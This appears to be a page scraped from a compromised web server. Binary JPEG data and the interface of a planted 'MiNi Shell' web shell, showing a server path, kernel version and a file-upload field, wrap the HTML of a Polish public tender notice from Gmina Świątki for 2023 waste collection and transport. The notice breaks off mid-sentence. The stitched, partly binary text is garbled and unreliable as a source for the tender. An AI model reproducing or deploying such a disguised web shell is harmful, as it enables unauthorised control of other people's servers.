JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221116/0044054701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Odbiór i transport odpadów komunalnych pochodzących od właścicieli nieruchomości zamieszkałych i niezamieszkałych na terenie Gminy Świątki w okresie od 01.01.2023 r. do 31.12.2023 r.” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA ŚWIĄTKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 510743203</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">87</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świątki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">11-008</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">896169232</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">896169822</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@swiatki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.swiatki.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Odbiór i transport odpadów komunalnych pochodzących od właścicieli nieruchomości zamieszkałych i niezamieszkałych na terenie Gminy Świątki w okresie od 01.01.2023 r. do 31.12.2023 r.” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8a870356-63f3-11ed-aea3-5a7c432eaced</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00440547</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00336471/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 ROS.271.11.2022</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://bip.swiatki.pl/?c=179 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postepowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym<br/>a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem:<br/>https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej: przetargi@swiatki.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń́ oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z<br/>elektronicznej platformy usług administracji publicznej (ePUAP).<br/>4. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz<br/>złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>5. Za datę̨ przekazania oferty, wniosków, zawiadomień́, dokumentów elektronicznych, oświadczeń́ lub<br/>elektronicznych kopii dokumentów lub oświadczeń́ oraz innych informacji przyjmuje się datę ich<br/>przekazania na ePUAP.<br/>6. Zamawiający przekazuje link do postepowania oraz ID postepowania jako załącznik<br/>do niniejszej SWZ. Dane postepowanie można wyszukać́ również̇ na Liście.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 <br/>z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>administratorem Pani/Pana danych osobowych jest Wójt Gminy Świątki – Sławomir Kowalczyk; <br/>inspektorem ochrony danych osobowych w Gminie Świątki jest Pan Tomasz Trzciałkowski, Tel. 511793443, Email: kontakt@idpo.pl, Zespół abi.olsztyn.pl<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na „ Odbiór i transport odpadów komunalnych pochodzących od właścicieli nieruchomości zamieszkałych i niezamieszkałych na terenie Gminy Świątki w okresie od 01.01.2023 r. do 31.12.2023 r.”<br/>Znak postępowania: ROS.271.11.2022, prowadzonym w trybie podstawowym.<br/><br/>Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 Pzp.<br/>Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/><br/>Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach Pzp, związanym z udziałem <br/>w postępowaniu o udzielenie zamówienia publicznego.<br/><br/>W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.<br/><br/>posiada Pani/Pan:<br/>na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; <br/>prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/><br/>Nie przysługuje Pani/Panu:<br/>w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/><br/>* Wyjaśnienie: informacja w tym zakresie jest wymagana, jeżeli w odniesieniu do danego administratora lub podmiotu przetwarzającego istnieje obowiązek wyznaczenia inspektora ochrony danych osobowych.<br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, <br/>w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ROS.271.11.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie usługi polegającej na odbiorze odpadów komunalnych i ich transporcie do Zakładu Gospodarki Odpadami Komunalnymi Sp. z o.o. w Olsztynie przy ul. Lubelskiej 53 w okresie od 01.01.2023 r. do 31-12-2023 r. :<br/>- z nieruchomości zamieszkałych z Gminy Świątki, wspólnot mieszkaniowych terenu gminy Świątki;<br/>- z nieruchomości na których nie zamieszkują mieszkańcy, a powstają odpady komunalne;<br/>„Przedmiot umowy obejmuje:<br/> 1) odbieranie odpadów komunalnych zmieszanych i selektywnie zebranych „u źródła” tj. bezpośrednio od właścicieli nieruchomości zamieszkałych położonych na terenie Gminy Świątki oraz z nieruchomości na których nie zamieszkują mieszkańcy, a powstają odpady komunalne; z terenu gminy Świątki, zgodnie z obowiązującym Regulaminem Utrzymania Czystości i Porządku na Terenie Gminy Świątki, obejmujących:<br/>a) zmieszane odpady komunalne – sposób odbioru,<br/>b) papier i tektura, opakowania z papieru i tektury,<br/>c) popiół,<br/>d) tworzywa sztuczne, opakowania z tworzyw sztucznych, metale,<br/>e) szkło, opakowania ze szkła ,<br/>f) meble i odpady wielkogabarytowe,<br/>g) zużyty sprzęt elektryczny i elektroniczny,<br/>h) biodegradowalne (odpady komunalne ulegające biodegradacji, w tym odpady kuchenne ulegające biodegradacji oraz odpady zielone).<br/> 2) transport odpadów do Zakładu Gospodarki Odpadami Komunalnymi Sp. z o.o. w Olsztynie przy ul. Lubelskiej 53;<br/> 3) odbieranie przeterminowanych leków zbieranych przez mieszkańców w punktach zbiórki wskazanych przez Zamawiającego znajdujących się na terenie Gminy Świątki wraz z wyposażeniem ich w oznakowane pojemniki;<br/> 4) Odbiór i zagospodarowanie odpadów komunalnych przyjętych w Punkcie Selektywnej Zbiórki Odpadów Komunalnych, zlokalizowanym na terenie Gminy Świątki. Posiadaczem odpadów w Punkcie Selektywnej Zbiórki Odpadów Komunalnych, zlokalizowanym na terenie Gminy Świątki na część nieruchomości niezabudowanej oznaczonej jako dz. nr 122 obręb Świątki, gmina Świątki o powierzchni 0,20 m2 (za Młynem) jest Gmina Świątki. Za odbiór i zagospodarowanie odpadów komunalnych przyjętych w Punkcie Selektywnej Zbiórki Odpadów Komunalnych, zlokalizowanym na terenie Gminy Świątki odpowiada wykonawca.<br/>Wykonawca ma obowiązek zatrudnić pracownika i w odpowiedni sposób wyposażyć i zorganizować PSZOK.<br/>Wykonawca we właściwy i zgodny z prawem sposób zagospodaruje odpady gromadzone na PSZOK.<br/>PSZOK prowadzi zbiórkę dostarczonych we własnym zakresie przez właścicieli nieruchomości zamieszkałych, wspólnot, z nieruchomości na których nie zamieszkują mieszkańcy, a powstają odpady komunalne; położonych na terenie Gminy Świątki odpadów komunalnych, tj:<br/>a) papier i tektura, opakowania z papieru i tektury,<br/>b) tworzywa sztuczne, opakowania z tworzyw sztucznych,<br/>c) szkło, opakowania ze szkła,<br/>d) biodegradowalne (odpady komunalne ulegające biodegradacji, w tym odpady kuchenne ulegające biodegradacji oraz odpady zielone),<br/>e) popioły i żużle powstające w gospodarstwach domowych,<br/>f) meble i inne odpady wielkogabarytowe,<br/>g) zużyty sprzęt elektryczny i elektroniczny,<br/>h) metale, opakowania z metali,<br/> i) odpady wielomateriałowe,<br/>j) chemikalia (rozpuszczalniki, oleje, tusze, farby, detergenty itp.),<br/>k) zużyte baterie i akumulatory,<br/> l) zużyte opony;<br/>m) zmieszane odpady z budowy, remontów i demontażu o kodzie odpadu 17 09 04.<br/><br/> 1. Charakterystyka Gminy Świątki:<br/> 1) Gmina Świątki obejmuje 21 miejscowości w tym: Świątki, Jankowo, Drzazgi, Kwiecewo, Różynka, Gołogóra, Garzewo, Skolity, Dąbrówka, Kalisty, Kłobia, Kiewry, Brzydowo, Brzeżno, Włodowo, Łumpia, Konradowo, Komalwy, Klony, Worławki oraz Żardeniki.<br/> 2) powierzchnia Gminy Światki ogółem wynosi 16 373 ha.<br/>liczba mieszkańców Gminy Świątki zameldowanych na stałe na dzień 27.10.2022 r. wynosi 3792 mieszkańców.<br/>Uwaga: Z deklaracji złożonych przez mieszkańców do dnia 27.10.2022 r. wynika, że faktycznie na terenie gminy zamieszkuje około 3792. Jednakże Wykonawca musi mieć na względzie, że ilość faktyczna może zmienić się i zbliżyć się do liczby zameldowanych osób na terenie gminy. W trakcie realizacji usługi możliwe są zmiany adresów i liczby obsługiwanych nieruchomości, jak i liczby mieszkańców. Zmiany mogą dotyczyć zarówno zmniejszenia, jak i zwiększenia liczby nieruchomości i liczby mieszkańców. Zmiany te nie będą wpływały na zmianę ceny określonej w ofercie.<br/> 4) Przewidywana do obsługi ilość nieruchomości zamieszkałych w gminie Świątki do obsługi obejmuje 619 budynków, w tym:<br/>a) budynki jednorodzinne (liczba nieruchomości w których złożono jedną lub dwie deklaracje) - 562 szt.:<br/>- Świątki – 105 szt.<br/>- pozostałe miejscowości w gminie – 457 szt.<br/>b) budynki wielolokalowe (liczba nieruchomości w których złożono więcej niż dwie deklaracje) – 57 szt.:<br/>- Świątki – 14 szt.<br/>- pozostałe miejscowości w gminie – 43 szt.<br/> 5) Szczegółowe dane dotyczące Gminy Świątki zawierają załączniki do SIWZ:<br/>nr 8 „Wykaz miejscowości na terenie Gminy Światki ”.<br/> 1. Przewidywana, orientacyjna łączna ilość odpadów komunalnych oddanych w 2023 r. <br/>wyniesie 662,48 Mg:<br/>odpady zmieszane- 408,34 Mg<br/>papier 20,16Mg<br/>szkło – 80,93 Mg<br/>tworzywa sztuczne – 88,21 Mg<br/>wielko gabaryty – 32,09 Mg<br/>opony samochodowe - 8,40 Mg<br/>urządzenia – freony – 0,00 Mg<br/>Odpady remontowe – 0,00 Mg<br/>Elektryczne – 0,00 Mg<br/>Biodegradowalne – 12,00 Mg<br/>Inne 20 01 99 – 12,36 Mg<br/><br/>Liczba osób zameldowanych stałych w Gminie Świątki: 3792 osób (dane na dzień 27.10.2020 r.) Ilość osób zamieszkujących Gminę Świątki zgłoszonych do opłaty za gospodarowanie odpadami komunalnymi wynosiła 3027.<br/>Szacunkowa odległość do instalacji ZGOK w miejscowości Olsztyn 33 km.<br/>Przedmiotem zamówienia jest odbiór i transport odpadów komunalnych pochodzących z nieruchomości zamieszkałych oraz z nieruchomości na których nie zamieszkują mieszkańcy, a powstają odpady komunalne z terenu Gminy Świątki, zgodnie z zapisami prawa:<br/> 1. ustawą z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2022 r., poz. 699, 1250, 1726) oraz rozporządzeniami wykonawczymi;<br/> 2. ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2022 r. poz. 1297, 1549) oraz rozporządzeniami wykonawczymi,<br/> 3. postanowieniami z obowiązującym Regulaminem utrzymania czystości i porządku na terenie Gminy Świątki;<br/> 4. Uchwała NR XIII/115/2019 RADY GMINY ŚWIĄTKI z dnia 29 listopada 2019 r. w sprawie zmiany Uchwały Nr XIX/173/2016 RADY GMINY ŚWIĄTKI z dnia 28 grudnia 2016 r. określenia szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z terenu Gminy Świątki i zagospodarowania tych odpadów;<br/> 5. zgodnie z Rozporządzeniem Ministra Środowiska z dnia 29 grudnia 2016 r. w sprawie szczegółowego sposobu selektywnego zbierania wybranych frakcji odpadów.<br/><br/><br/>Zakres zamówienia obejmuje:<br/>Odbiór i transport zmieszanych odpadów komunalnych zgromadzonych w pojemnikach, workach i kontenerach pochodzących z nieruchomości zamieszkałych w przypadku właścicieli nieruchomości prowadzących selektywną zbiórkę odpadów, odpady stanowiące pozostałość po wysegregowaniu wszystkich frakcji, do których wysegregowania zobowiązuje regulamin utrzymania czystości i porządku na terenie Gminy Świątki.<br/>Odbiór i transport odpadów segregowanych z nieruchomości zamieszkałych oraz z nieruchomości, na których nie zamieszkują mieszkańcy, a powstają odpady komunalne zbieranych zarówno w workach, pojemnikach oraz kontenerach w odpowiednich kolorach wg obecnie obowiązującego regulaminu:<br/> • papier i makulatura – kolor niebieski;<br/> • metale i tworzywa sztuczne – kolor żółty;<br/> • szkło – kolor zielony;<br/> • popiół – kolor szary;<br/> • biodegradowalne – kolor brązowy,<br/> • niesegregowane (zmieszane) odpady komunalne – dopuszczony kolor to czarny, metalowy – ocynkowany, ciemnoszary lub ciemnozielony). Do zbierania niesegregowanych (zmieszanych) odpadów komunalnych dopuszcza się pojemniki o pojemności 110 l, które traktuje się jako równoważne pojemnikom o pojemności 120 l.<br/><br/>Odbiór odpadów wielkogabarytowych (meble, okna, wanny, brodziki, telewizory, lodówki, opony samochodowe i inne) dwa razy w roku – przed sezonem letnim i przed sezonem zimowym, bądź na bieżąco w selektywnym punkcie gromadzenia odpadów, odbieranych od właścicieli nieruchomości zamieszkałych wystawionych przed nieruchomością.<br/>Odbiór i zagospodarowanie wszystkich odpadów komunalnych zebranych selektywnie w Punkcie Selektywnej Zbiórki Odpadów Komunalnych.<br/>Transport odpadów.<br/>Utrzymanie porządku i czystości wokół pojemników podczas odbioru odpadów komunalnych od właścicieli nieruchomości. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <p class="mb-0">90513100-7 - Usługi wywozu odpadów pochodzących z gospodarstw domowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">30%</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">cena 60<br/>aspekty społeczne 40</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">aspekty społeczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Zamawiający określa warunki udziału w postępowaniu, dotyczące:<br/>1) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>a) wpis do „Rejestru podmiotów, wprowadzających produkty, produkty w opakowaniach<br/>i gospodarujących odpadami (BDO)” prowadzonego przez Marszałka Województwa jako<br/>zbierający odpady lub przetwarzający odpady zgodnie z treścią zezwolenia oraz transportujący<br/>odpady w zakresie wszystkich odpadów objętych przedmiotem zamówienia.<br/>2)sytuacji ekonomicznej lub finansowe:<br/>a) Zamawiający uzna warunek udziału za spełniony, jeżeli Wykonawca wykaże, że jest<br/>ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej<br/>związanej z przedmiotem zamówienia na sumę gwarancyjna tego ubezpieczenia na kwotę nie<br/>mniejsza niż 300.000,00 zł;<br/>2) zdolności technicznej lub 